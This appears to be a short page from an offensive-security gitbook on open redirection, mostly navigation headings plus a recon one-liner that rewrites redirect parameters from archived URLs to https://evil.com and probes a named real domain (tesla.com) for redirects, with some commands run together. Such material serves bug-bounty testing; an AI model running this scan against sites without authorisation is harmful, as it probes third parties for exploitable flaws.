Open Redirection
Open Redirection
One-Liner
cat waybacks.txt | \
sed -E 's#(redirect=|url=|next=|return=|dest=|destination=|continue=|goto=|redirecturl=)[^&]*#\1https://evil.com#gI' | \
httpx -silent -mc 301,302,307,308 -locationecho "http://tesla.com" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anewPayloads
Parameter Pollution
Creating folder as victim domain
Nuclei Template
XSS in Login Page
XSS in Login PageHeader Based Open Redir
DOM Based redirect - XSS
XSSURL Validation Bypass
OAuth - Open Redirection to Token Leak
OAuth / Okta MisconfigurationTools
Interesting Books
Interesting BooksSupport this Gitbook
Resources
Last updated
